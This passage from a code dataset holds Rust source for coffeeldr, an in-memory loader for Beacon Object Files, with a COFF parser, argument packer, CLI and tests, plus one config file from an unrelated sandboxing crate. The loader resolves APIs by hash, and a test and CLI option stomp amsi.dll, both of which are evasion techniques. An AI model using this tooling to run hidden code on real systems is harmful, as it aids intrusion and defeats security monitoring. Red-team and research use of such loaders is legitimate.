/// the symbol being referenced. When a resolved function address is
/// available, it is written into the appropriate location; otherwise,
/// the relocation is applied relative to the target section base.
///
/// # Errors
///
/// Fails if the relocation kind is not supported for the active architecture.
fn process_relocations(
&self,
reloc_addr: *mut c_void,
function_address: *mut c_void,
symbols: *mut *mut c_void,
relocation: &IMAGE_RELOCATION,
symbol: &IMAGE_SYMBOL
) -> Result<()> {
debug!(
"Processing relocation: Type = {}, Symbol Type = {}, StorageClass = {}, Section Number: {}",
relocation.Type, symbol.Type, symbol.StorageClass, symbol.SectionNumber
);
unsafe {
if symbol.StorageClass == IMAGE_SYM_CLASS_EXTERNAL as u8 && symbol.SectionNumber == 0 {
match self.coff.arch {
CoffMachine::X64 => {
if relocation.Type as u32 == IMAGE_REL_AMD64_REL32 && !function_address.is_null() {
let relative_address = (symbols as usize)
.wrapping_sub(reloc_addr as usize)
.wrapping_sub(size_of::<u32>());
write_unaligned(reloc_addr as *mut u32, relative_address as u32);
return Ok(())
}
},
CoffMachine::X32 => {
if relocation.Type as u32 == IMAGE_REL_I386_DIR32 && !function_address.is_null() {
write_unaligned(reloc_addr as *mut u32, symbols as u32);
return Ok(())
}
}
}
}
let section_addr = self.section_map[(symbol.SectionNumber - 1) as usize].base;
match self.coff.arch {
CoffMachine::X64 => {
match relocation.Type as u32 {
IMAGE_REL_AMD64_ADDR32NB if function_address.is_null() => {
write_unaligned(
reloc_addr as *mut u32,
read_unaligned(reloc_addr as *mut u32)
.wrapping_add((section_addr as usize)
.wrapping_sub(reloc_addr as usize)
.wrapping_sub(size_of::<u32>()) as u32
),
);
},
IMAGE_REL_AMD64_ADDR64 if function_address.is_null() => {
write_unaligned(
reloc_addr as *mut u64,
read_unaligned(reloc_addr as *mut u64)
.wrapping_add(section_addr as u64),
);
},
r @ IMAGE_REL_AMD64_REL32..=IMAGE_REL_AMD64_REL32_5 => {
write_unaligned(
reloc_addr as *mut u32,
read_unaligned(reloc_addr as *mut u32)
.wrapping_add((section_addr as usize)
.wrapping_sub(reloc_addr as usize)
.wrapping_sub(size_of::<u32>())
.wrapping_sub((r - 4) as usize) as u32
),
);
},
_ => return Err(CoffeeLdrError::InvalidRelocationType(relocation.Type))
}
},
CoffMachine::X32 => {
match relocation.Type as u32 {
IMAGE_REL_I386_REL32 if function_address.is_null() => {
write_unaligned(
reloc_addr as *mut u32,
read_unaligned(reloc_addr as *mut u32)
.wrapping_add((section_addr as usize)
.wrapping_sub(reloc_addr as usize)
.wrapping_sub(size_of::<u32>()) as u32
)
);
},
IMAGE_REL_I386_DIR32 if function_address.is_null() => {
write_unaligned(
reloc_addr as *mut u32,
read_unaligned(reloc_addr as *mut u32)
.wrapping_add(section_addr as u32)
);
},
_ => return Err(CoffeeLdrError::InvalidRelocationType(relocation.Type))
}
}
}
}
Ok(())
}
}
fn read_file(name: &str) -> Result<Vec<u8>> {
let file_name = CString::new(name)
.map_err(|_| CoffeeLdrError::Msg(s!("invalid cstring")))?;
let h_file = unsafe {
CreateFileA(
file_name.as_ptr().cast(),
GENERIC_READ,
FILE_SHARE_READ,
null_mut(),
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
null_mut(),
)
};
if h_file == INVALID_HANDLE_VALUE {
return Err(CoffeeLdrError::Msg(s!("failed to open file")));
}
let size = unsafe { GetFileSize(h_file, null_mut()) };
if size == INVALID_FILE_SIZE {
return Err(CoffeeLdrError::Msg(s!("invalid file size")));
}
let mut out = vec![0u8; size as usize];
let mut bytes = 0;
unsafe {
ReadFile(
h_file,
out.as_mut_ptr(),
out.len() as u32,
&mut bytes,
null_mut(),
);
}
Ok(out)
}
#[inline]
fn NtFreeVirtualMemory(
process_handle: *mut c_void,
base_address: *mut *mut c_void,
region_size: *mut usize,
free_type: u32
) {
dinvoke!(
get_ntdll_address(),
s!("NtFreeVirtualMemory"),
unsafe extern "system" fn(
process_handle: *mut c_void,
base_address: *mut *mut c_void,
region_size: *mut usize,
free_type: u32,
) -> NTSTATUS,
process_handle,
base_address,
region_size,
free_type
);
}
#[inline]
fn LoadLibraryExA(
lp_lib_file_name: *const u8,
h_file: *mut c_void,
dw_flags: u32
) -> Option<*mut c_void> {
let kernel32 = get_module_address(2808682670u32, Some(dinvk::hash::murmur3));
dinvoke!(
kernel32,
s!("LoadLibraryExA"),
unsafe extern "system" fn(
lp_lib_file_name: *const u8,
h_file: *mut c_void,
dw_flags: u32,
) -> *mut c_void,
lp_lib_file_name,
h_file,
dw_flags
)
}
#[cfg(test)]
mod tests {
use crate::{*, error::Result};
#[test]
fn test_whoami() -> Result<()> {
let mut coffee = CoffeeLdr::new("bofs/whoami.x64.o")?;
let output = coffee.run("go", None, None)?;
assert!(
output.contains("\\")
|| output.contains("User")
|| output.contains("Account")
|| output.contains("Authority"),
"whoami output does not look valid: {output}"
);
Ok(())
}
#[test]
fn test_stomping() -> Result<()> {
let mut coffee = CoffeeLdr::new("bofs/whoami.x64.o")?.with_module_stomping("amsi.dll");
let output = coffee.run("go", None, None)?;
assert!(
output.contains("\\")
|| output.contains("User")
|| output.contains("Account"),
"whoami output (with stomping) looks invalid: {output}"
);
Ok(())
}
#[test]
fn test_dir() -> Result<()> {
let mut pack = BeaconPack::default();
pack.addstr("C:\\Windows")?;
let args = pack.get_buffer_hex()?;
let mut coffee = CoffeeLdr::new("bofs/dir.x64.o")?;
let output = coffee.run("go", Some(args.as_ptr() as _), Some(args.len()))?;
assert!(
output.contains("Directory of")
|| output.contains("File(s)")
|| output.contains("Dir(s)")
|| output.contains("bytes"),
"dir output does not look valid: {output}"
);
Ok(())
}
#[test]
fn test_buffer_memory() -> Result<()> {
let buffer = include_bytes!("../bofs/whoami.x64.o");
let mut coffee = CoffeeLdr::new(buffer)?;
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | true |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/beacon_pack.rs | src/beacon_pack.rs | use alloc::vec::Vec;
use binrw::io::Write;
use hex::FromHex;
use crate::error::Result;
/// Buffer used to build Beacon-compatible packed arguments.
///
/// The buffer keeps track of the total payload size and exposes helpers
/// for appending integers, strings, wide strings and raw binary data.
#[derive(Default)]
pub struct BeaconPack {
/// Internal byte buffer backing this pack.
buffer: Vec<u8>,
/// Logical size of the packed payload (excluding the size prefix).
size: u32,
}
impl BeaconPack {
/// Returns a copy of the packed buffer with the size prefix prepended.
///
/// The resulting vector starts with a 4-byte little-endian length field,
/// followed by the raw payload accumulated so far.
pub fn getbuffer(&self) -> Result<Vec<u8>> {
let mut buf = Vec::with_capacity(4 + self.buffer.len());
buf.extend_from_slice(&self.size.to_le_bytes());
buf.extend_from_slice(&self.buffer);
Ok(buf)
}
/// Returns the packed buffer encoded as hexadecimal bytes.
///
/// The packed payload (including the size prefix) is hex-encoded and
/// the resulting ASCII representation is returned as a byte vector.
///
/// # Errors
///
/// Propagates any error produced during hex conversion.
pub fn get_buffer_hex(&self) -> Result<Vec<u8>> {
let buf = self.getbuffer()?;
Ok(Vec::from_hex(hex::encode(&buf))?)
}
/// Appends a 2-byte signed integer to the buffer.
///
/// The value is written in little-endian format and the tracked size
/// is increased accordingly.
pub fn addshort(&mut self, short: i16) {
self.write_i16(short);
self.size += 2;
}
/// Appends a 4-byte signed integer to the buffer.
///
/// The value is written in little-endian format and the tracked size
/// is increased accordingly.
pub fn addint(&mut self, int: i32) {
self.write_i32(int);
self.size += 4;
}
/// Appends a UTF-8 string with a length prefix and null terminator.
///
/// # Errors
///
/// Propagates any error produced while writing into the internal buffer.
pub fn addstr(&mut self, s: &str) -> Result<()> {
let s_bytes = s.as_bytes();
let length = s_bytes.len() as u32 + 1;
self.write_u32(length);
self.buffer.write_all(s_bytes)?;
// Null terminator.
self.write_u8(0);
self.size += 4 + s_bytes.len() as u32 + 1;
Ok(())
}
/// Appends a UTF-16LE wide string with a length prefix and null terminator.
///
/// # Errors
///
/// Propagates any error produced while writing into the internal buffer.
pub fn addwstr(&mut self, s: &str) {
let s_wide: Vec<u16> = s.encode_utf16().collect();
let length = (s_wide.len() as u32 * 2) + 2;
self.write_u32(length);
for wchar in s_wide {
self.write_u16(wchar);
}
self.write_u16(0);
self.size += 4 + length;
}
/// Appends a raw binary blob with a length prefix.
///
/// # Errors
///
/// Propagates any error produced while writing into the internal buffer.
pub fn addbin(&mut self, data: &[u8]) -> Result<()> {
let length = data.len() as u32;
self.write_u32(length);
self.buffer.write_all(data)?;
self.size += 4 + length;
Ok(())
}
/// Clears the internal buffer and resets the tracked size.
pub fn reset(&mut self) {
self.buffer.clear();
self.size = 0;
}
}
impl BeaconPack {
/// Writes a single byte to the buffer.
fn write_u8(&mut self, value: u8) {
self.buffer.extend_from_slice(&value.to_le_bytes());
}
/// Writes a 2-byte unsigned integer in little-endian format.
fn write_u16(&mut self, value: u16) {
self.buffer.extend_from_slice(&value.to_le_bytes());
}
/// Writes a 2-byte signed integer in little-endian format.
fn write_i16(&mut self, value: i16) {
self.buffer.extend_from_slice(&value.to_le_bytes());
}
/// Writes a 4-byte unsigned integer in little-endian format.
fn write_u32(&mut self, value: u32) {
self.buffer.extend_from_slice(&value.to_le_bytes());
}
/// Writes a 4-byte signed integer in little-endian format.
fn write_i32(&mut self, value: i32) {
self.buffer.extend_from_slice(&value.to_le_bytes());
}
}
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/coff.rs | src/coff.rs | //! COFF parsing utilities for the CoffeeLdr loader.
use core::ffi::{CStr, c_void};
use alloc::{
string::{String, ToString},
vec::Vec,
};
use log::{debug, warn};
use binrw::{BinRead, binread};
use binrw::io::Cursor;
use crate::error::{CoffError, CoffeeLdrError};
// Architecture definitions for x64
const COFF_MACHINE_X64: u16 = 0x8664;
// Architecture definitions for x32
const COFF_MACHINE_X32: u16 = 0x14c;
/// Limit of sections supported by the Windows loader
const MAX_SECTIONS: u16 = 96;
/// Represents a COFF (Common Object File Format) file.
pub struct Coff<'a> {
/// The COFF file header (`IMAGE_FILE_HEADER`).
pub file_header: IMAGE_FILE_HEADER,
/// A vector of COFF symbols (`IMAGE_SYMBOL`).
pub symbols: Vec<IMAGE_SYMBOL>,
/// A vector of section headers (`IMAGE_SECTION_HEADER`).
pub sections: Vec<IMAGE_SECTION_HEADER>,
/// The raw contents of the file read into memory
pub buffer: &'a [u8],
/// Architecture of the COFF File (x64 or x32)
pub arch: CoffMachine,
}
impl<'a> Default for Coff<'a> {
fn default() -> Self {
Self {
file_header: IMAGE_FILE_HEADER::default(),
symbols: Vec::new(),
sections: Vec::new(),
buffer: &[],
arch: CoffMachine::X64,
}
}
}
impl<'a> Coff<'a> {
/// Parses a COFF object from a byte slice.
///
/// The slice must contain a valid COFF file header, section table and
/// symbol table. Minimal validation is performed to ensure the layout is
/// consistent.
///
/// # Errors
///
/// Fails when the file is too small, the header is invalid, the
/// architecture is unsupported, or any section or symbol fails to decode.
pub fn parse(buffer: &'a [u8]) -> Result<Self, CoffError> {
debug!("Parsing COFF file header, buffer size: {}", buffer.len());
// Validates that the file has the minimum size to contain a COFF header
if buffer.len() < size_of::<IMAGE_FILE_HEADER>() {
return Err(CoffError::InvalidCoffFile);
}
// Creating a cursor
let mut cursor = Cursor::new(buffer);
// The COFF file header
let file_header = IMAGE_FILE_HEADER::read(&mut cursor)
.map_err(|_| CoffError::InvalidCoffFile)?;
// Detects the architecture of the COFF file and returns an enum `CoffMachine`
let arch = Self::validate_architecture(file_header)?;
// Checks that the number of sections and symbols is valid
let num_sections = file_header.NumberOfSections;
let num_symbols = file_header.NumberOfSymbols;
if num_sections == 0 || num_symbols == 0 {
return Err(CoffError::InvalidSectionsOrSymbols);
}
// Validation of the maximum number of sections (Windows limit)
if num_sections > MAX_SECTIONS {
warn!("Exceeded maximum number of sections: {} > {}", num_sections, MAX_SECTIONS);
return Err(CoffError::SectionLimitExceeded);
}
// A vector of COFF symbols
let symbol_offset = file_header.PointerToSymbolTable as usize;
let mut cursor = Cursor::new(&buffer[symbol_offset..]);
let symbols = (0..num_symbols)
.map(|_| {
IMAGE_SYMBOL::read(&mut cursor)
.map_err(|_| CoffError::InvalidCoffSymbolsFile)
})
.collect::<Result<Vec<IMAGE_SYMBOL>, _>>()?;
// A vector of COFF sections
let section_offset = size_of::<IMAGE_FILE_HEADER>() + file_header.SizeOfOptionalHeader as usize;
let mut section_cursor = Cursor::new(&buffer[section_offset..]);
let sections = (0..num_sections)
.map(|_| {
IMAGE_SECTION_HEADER::read(&mut section_cursor)
.map_err(|_| CoffError::InvalidCoffSectionFile)
})
.collect::<Result<Vec<IMAGE_SECTION_HEADER>, _>>()?;
Ok(Self {
file_header,
symbols,
sections,
buffer,
arch,
})
}
/// Determines the machine architecture from the COFF header.
///
/// # Errors
///
/// Fails if the machine field does not match any supported architecture.
#[inline]
fn validate_architecture(file_header: IMAGE_FILE_HEADER) -> Result<CoffMachine, CoffError> {
match file_header.Machine {
COFF_MACHINE_X64 => Ok(CoffMachine::X64),
COFF_MACHINE_X32 => Ok(CoffMachine::X32),
_ => {
warn!("Unsupported COFF architecture: {:?}", file_header.Machine);
Err(CoffError::UnsupportedArchitecture)
}
}
}
/// Computes the total allocation size needed to load the COFF image.
pub fn size(&self) -> usize {
let length = self
.sections
.iter()
.filter(|section| section.SizeOfRawData > 0)
.map(|section| Self::page_align(section.SizeOfRawData as usize))
.sum();
let total_length = self
.sections
.iter()
.fold(length, |mut total_length, section| {
let relocations = self.get_relocations(section);
relocations.iter().for_each(|relocation| {
let sym = &self.symbols[relocation.SymbolTableIndex as usize];
let name = self.get_symbol_name(sym);
if name.starts_with("__imp_") {
total_length += size_of::<*const c_void>();
}
});
total_length
});
debug!("Total image size after alignment: {} bytes", total_length);
Self::page_align(total_length)
}
/// Returns relocation entries for the specified section.
///
/// Invalid relocations are logged and skipped, allowing parsing to proceed.
pub fn get_relocations(&self, section: &IMAGE_SECTION_HEADER) -> Vec<IMAGE_RELOCATION> {
let reloc_offset = section.PointerToRelocations as usize;
let num_relocs = section.NumberOfRelocations as usize;
let mut relocations = Vec::with_capacity(num_relocs);
let mut cursor = Cursor::new(&self.buffer[reloc_offset..]);
for _ in 0..num_relocs {
match IMAGE_RELOCATION::read(&mut cursor) {
Ok(reloc) => relocations.push(reloc),
Err(_e) => {
debug!("Failed to read relocation: {_e:?}");
continue;
}
}
}
relocations
}
/// Reads the symbol name, handling short names and long names from the string table.
pub fn get_symbol_name(&self, symtbl: &IMAGE_SYMBOL) -> String {
unsafe {
let name = if symtbl.N.ShortName[0] != 0 {
String::from_utf8_lossy(&symtbl.N.ShortName).into_owned()
} else {
let long_name_offset = symtbl.N.Name.Long as usize;
let string_table_offset = self.file_header.PointerToSymbolTable as usize
+ self.file_header.NumberOfSymbols as usize * size_of::<IMAGE_SYMBOL>();
// Retrieve the name from the string table
let offset = string_table_offset + long_name_offset;
let name_ptr = &self.buffer[offset] as *const u8;
CStr::from_ptr(name_ptr.cast())
.to_string_lossy()
.into_owned()
};
name.trim_end_matches('\0').to_string()
}
}
/// Rounds a value up to the next page boundary.
#[inline]
pub fn page_align(page: usize) -> usize {
const SIZE_OF_PAGE: usize = 0x1000;
(page + SIZE_OF_PAGE - 1) & !(SIZE_OF_PAGE - 1)
}
/// Extracts the section name, trimming trailing NUL bytes.
#[inline]
pub fn get_section_name(section: &IMAGE_SECTION_HEADER) -> String {
let s = String::from_utf8_lossy(§ion.Name);
s.trim_end_matches('\0').to_string()
}
/// Determines whether a symbol type describes a function.
#[inline]
pub fn is_fcn(ty: u16) -> bool {
(ty & 0x30) == (2 << 4)
}
}
/// Represents the architecture of the COFF file.
#[derive(Debug, PartialEq, Hash, Clone, Copy, Eq, PartialOrd, Ord)]
pub enum CoffMachine {
/// 64-bit architecture.
X64,
/// 32-bit architecture.
X32,
}
impl CoffMachine {
/// Validates that the COFF architecture matches the host process.
///
/// # Errors
///
/// Fails if the COFF architecture does not match the current pointer width.
#[inline]
pub fn check_architecture(&self) -> Result<(), CoffeeLdrError> {
match self {
CoffMachine::X32 => {
if cfg!(target_pointer_width = "64") {
return Err(CoffeeLdrError::ArchitectureMismatch {
expected: "x32",
actual: "x64",
});
}
}
CoffMachine::X64 => {
if cfg!(target_pointer_width = "32") {
return Err(CoffeeLdrError::ArchitectureMismatch {
expected: "x64",
actual: "x32",
});
}
}
}
Ok(())
}
}
/// Represents the COFF data source.
pub enum CoffSource<'a> {
/// COFF file indicated by a string representing the file path.
File(&'a str),
/// Memory buffer containing COFF data.
Buffer(&'a [u8]),
}
impl<'a> From<&'a str> for CoffSource<'a> {
fn from(file: &'a str) -> Self {
CoffSource::File(file)
}
}
impl<'a, const N: usize> From<&'a [u8; N]> for CoffSource<'a> {
fn from(buffer: &'a [u8; N]) -> Self {
CoffSource::Buffer(buffer)
}
}
impl<'a> From<&'a [u8]> for CoffSource<'a> {
fn from(buffer: &'a [u8]) -> Self {
CoffSource::Buffer(buffer)
}
}
/// Represents the file header of a COFF (Common Object File Format) file.
#[binread]
#[derive(Default, Debug, Clone, Copy)]
#[br(little)]
#[repr(C)]
pub struct IMAGE_FILE_HEADER {
/// The target machine architecture (e.g., x64, x32).
pub Machine: u16,
/// The number of sections in the COFF file.
pub NumberOfSections: u16,
/// The timestamp when the file was created.
pub TimeDateStamp: u32,
/// The pointer to the symbol table.
pub PointerToSymbolTable: u32,
/// The number of symbols in the COFF file.
pub NumberOfSymbols: u32,
/// The size of the optional header.
pub SizeOfOptionalHeader: u16,
/// The characteristics of the file.
pub Characteristics: u16,
}
/// Represents a symbol in the COFF symbol table.
#[binread]
#[derive(Clone, Copy)]
#[br(little)]
#[repr(C, packed(2))]
pub struct IMAGE_SYMBOL {
#[br(temp)]
name_raw: [u8; 8],
/// The value associated with the symbol.
pub Value: u32,
/// The section number that contains the symbol.
pub SectionNumber: i16,
/// The type of the symbol.
pub Type: u16,
/// The storage class of the symbol (e.g., external, static).
pub StorageClass: u8,
/// The number of auxiliary symbol records.
pub NumberOfAuxSymbols: u8,
#[br(calc = unsafe {
core::ptr::read_unaligned(name_raw.as_ptr() as *const IMAGE_SYMBOL_0)
})]
pub N: IMAGE_SYMBOL_0,
}
/// A union representing different ways a symbol name can be stored.
#[repr(C, packed(2))]
#[derive(Clone, Copy)]
pub union IMAGE_SYMBOL_0 {
/// A short symbol name (8 bytes).
pub ShortName: [u8; 8],
/// A long symbol name stored in a different structure.
pub Name: IMAGE_SYMBOL_0_0,
/// Long symbol name stored as a pair of u32 values.
pub LongName: [u32; 2],
}
/// Represents the long name of a symbol as a pair of values.
#[repr(C, packed(2))]
#[derive(Clone, Copy)]
pub struct IMAGE_SYMBOL_0_0 {
/// The offset to the symbol name.
pub Short: u32,
/// The length of the symbol name.
pub Long: u32,
}
/// Represents a section header in a COFF file.
#[binread]
#[repr(C)]
#[br(little)]
#[derive(Clone, Copy)]
pub struct IMAGE_SECTION_HEADER {
/// The name of the section (8 bytes).
pub Name: [u8; 8],
#[br(temp)]
misc_raw: u32,
/// The virtual address of the section in memory.
pub VirtualAddress: u32,
/// The size of the section's raw data.
pub SizeOfRawData: u32,
/// The pointer to the raw data in the file.
pub PointerToRawData: u32,
/// The pointer to relocation entries.
pub PointerToRelocations: u32,
/// The pointer to line numbers (if any).
pub PointerToLinenumbers: u32,
/// The number of relocations in the section.
pub NumberOfRelocations: u16,
/// The number of line numbers in the section.
pub NumberOfLinenumbers: u16,
/// Characteristics that describe the section (e.g., executable, writable).
pub Characteristics: u32,
#[br(calc = IMAGE_SECTION_HEADER_0 {
PhysicalAddress: misc_raw
})]
pub Misc: IMAGE_SECTION_HEADER_0,
}
/// A union representing either the physical or virtual size of the section.
#[repr(C)]
#[derive(Clone, Copy)]
pub union IMAGE_SECTION_HEADER_0 {
/// The physical address of the section.
pub PhysicalAddress: u32,
/// The virtual size of the section.
pub VirtualSize: u32,
}
/// Represents a relocation entry in a COFF file.
#[binread]
#[br(little)]
#[repr(C, packed(2))]
pub struct IMAGE_RELOCATION {
#[br(temp)]
va_raw: u32,
/// The index of the symbol in the symbol table.
pub SymbolTableIndex: u32,
/// The type of relocation.
pub Type: u16,
#[br(calc = IMAGE_RELOCATION_0 {
VirtualAddress: va_raw
})]
pub Anonymous: IMAGE_RELOCATION_0,
}
/// A union representing either the virtual address or relocation count.
#[repr(C, packed(2))]
pub union IMAGE_RELOCATION_0 {
/// The virtual address of the relocation.
pub VirtualAddress: u32,
/// The relocation count.
pub RelocCount: u32,
}
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/cli/src/main.rs | cli/src/main.rs | use clap_verbosity_flag::Verbosity;
use log::{error, info};
use clap::Parser;
use base64::{engine::general_purpose, Engine as _};
use coffeeldr::{BeaconPack, CoffeeLdr};
mod logging;
/// The main command-line interface struct.
#[derive(Parser)]
#[clap(author="joaoviictorti", about="A COFF loader written in Rust")]
pub struct Cli {
/// The command to be executed.
#[arg(short, long, required = true)]
pub bof: String,
/// Entrypoint to use in the execution.
#[arg(short, long, default_value_t = default_entrypoint())]
pub entrypoint: String,
/// Multiple arguments in the format `/short:<value>`, `/int:<value>`, `/str:<value>`, `/wstr:<value>`, `/bin:<base64-data>`, `/bin_path:<bin-file-path>`
#[arg(value_parser)]
pub inputs: Option<Vec<String>>,
/// Enables module stomping (e.g., --stomping chakra.dll)
#[arg(long)]
pub stomping: Option<String>,
#[command(flatten)]
pub verbose: Verbosity,
}
/// Function to set the default entrypoint value based on the architecture.
fn default_entrypoint() -> String {
if cfg!(target_pointer_width = "64") {
"go".to_string()
} else {
"_go".to_string()
}
}
/// Processes each input according to its type and adds it to the buffer.
fn process_input(input: &str, pack: &mut BeaconPack) -> Result<(), String> {
if input.starts_with("/short:") {
let short_data = &input[7..];
match short_data.parse::<i16>() {
Ok(value) => {
pack.addshort(value);
info!("Added short: {}", value);
}
Err(e) => return Err(format!("Error converting to short: {e}")),
}
} else if input.starts_with("/int:") {
let int_data = &input[5..];
match int_data.parse::<i32>() {
Ok(value) => {
pack.addint(value);
info!("Added int: {}", value);
}
Err(e) => return Err(format!("Error converting to int: {e}")),
}
} else if input.starts_with("/str:") {
let str_data = &input[5..];
pack.addstr(str_data).map_err(|e| format!("Error adding str: {e}"))?;
info!("Added string: {}", str_data);
} else if input.starts_with("/wstr:") {
let wstr_data = &input[6..];
pack.addwstr(wstr_data);
info!("Added wide string: {}", wstr_data);
} else if input.starts_with("/bin:") {
let base64_data = &input[5..];
match general_purpose::STANDARD.decode(base64_data) {
Ok(decoded) => {
pack.addbin(&decoded).map_err(|e| format!("Error adding bin: {e}"))?;
info!("Added binary: {}", base64_data);
}
Err(e) => return Err(format!("Error decoding Base64: {e}")),
}
} else if input.starts_with("/bin_path:") {
let file_path = &input[10..];
let file_fd = std::path::Path::new(file_path);
if !file_fd.exists() {
return Err(format!("File not found: {}", file_path));
}
match std::fs::read(file_fd) {
Ok(file_data) => {
pack.addbin(&file_data).map_err(|e| format!("Error adding bin: {e}"))?;
info!("Added binary file: {}", file_path);
},
Err(e) => return Err(format!("Error reading file '{}': {e}", file_path)),
}
} else {
return Err(format!("Invalid input format: {input}"));
}
Ok(())
}
fn main() -> Result<(), Box<dyn std::error::Error>> {
// Parse CLI arguments
let cli = Cli::parse();
// Initializes global logger
logging::init_logger(&cli.verbose);
// Initialize the buffer
let mut pack = BeaconPack::default();
// Process inputs if provided
if let Some(inputs) = &cli.inputs {
for input in inputs {
process_input(input, &mut pack)
.map_err(|e| error!("{e}"))
.map_err(|_| "Input processing failed")?;
}
} else {
info!("No inputs were provided.");
}
// Prepare buffer and length if inputs were provided
let vec_buffer = if cli.inputs.is_some() {
// Get the buffer from the pack
Some(pack.get_buffer_hex()?)
} else {
None
};
let (buffer, len) = if let Some(ref buf) = vec_buffer {
// Pass the pointer and length if buffer exists
(Some(buf.as_ptr() as *mut u8), Some(buf.len()))
} else {
// No inputs, pass None
(None, None)
};
// Run CoffeeLdr
let mut coffee = CoffeeLdr::new(cli.bof.as_str())?;
coffee = if let Some(ref module_name) = cli.stomping {
info!("Module stomping enabled: {}", module_name);
coffee.with_module_stomping(module_name)
} else {
coffee
};
match coffee.run(&cli.entrypoint, buffer, len) {
Ok(result) => print!("Output:\n {result}"),
Err(err_code) => error!("{:?}", err_code),
}
Ok(())
}
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/cli/src/logging.rs | cli/src/logging.rs | use clap_verbosity_flag::Verbosity;
use env_logger::Builder;
use log::{Level, LevelFilter};
/// Initializes the logger
pub fn init_logger(verbosity: &Verbosity) {
let level = verbosity
.log_level()
.map(level_to_filter)
.unwrap_or(LevelFilter::Warn);
Builder::new()
.filter_level(level)
.parse_default_env()
.init();
}
fn level_to_filter(level: Level) -> LevelFilter {
match level {
Level::Error => LevelFilter::Error,
Level::Warn => LevelFilter::Warn,
Level::Info => LevelFilter::Info,
Level::Debug => LevelFilter::Debug,
Level::Trace => LevelFilter::Trace,
}
} | rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
tailhook/unshare | https://github.com/tailhook/unshare/blob/6cdc15d97aca90f59d1427e01da4c461184d0fe4/src/config.rs | src/config.rs | use std::default::Default;
use std::ffi::CString;
use std::collections::HashMap;
use nix::sys::signal::{Signal, SIGKILL};
use nix::sched::CloneFlags;
use libc::{uid_t, gid_t};
use crate::idmap::{UidMap, GidMap};
use crate::namespace::Namespace;
use crate::stdio::Closing;
pub struct Config {
pub death_sig: Option<Signal>,
pub work_dir: Option<CString>,
pub uid: Option<uid_t>,
pub gid: Option<gid_t>,
pub supplementary_gids: Option<Vec<gid_t>>,
pub id_maps: Option<(Vec<UidMap>, Vec<GidMap>)>,
pub namespaces: CloneFlags,
pub setns_namespaces: HashMap<Namespace, Closing>,
pub restore_sigmask: bool,
pub make_group_leader: bool,
// TODO(tailhook) session leader
}
impl Default for Config {
fn default() -> Config {
Config {
death_sig: Some(SIGKILL),
work_dir: None,
uid: None,
gid: None,
supplementary_gids: None,
id_maps: None,
namespaces: CloneFlags::empty(),
setns_namespaces: HashMap::new(),
restore_sigmask: true,
make_group_leader: false,
}
}
}
| rust | Apache-2.0 | 6cdc15d97aca90f59d1427e01da4c461184d0fe4 | 2026-01-04T20:21:52.548549Z | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.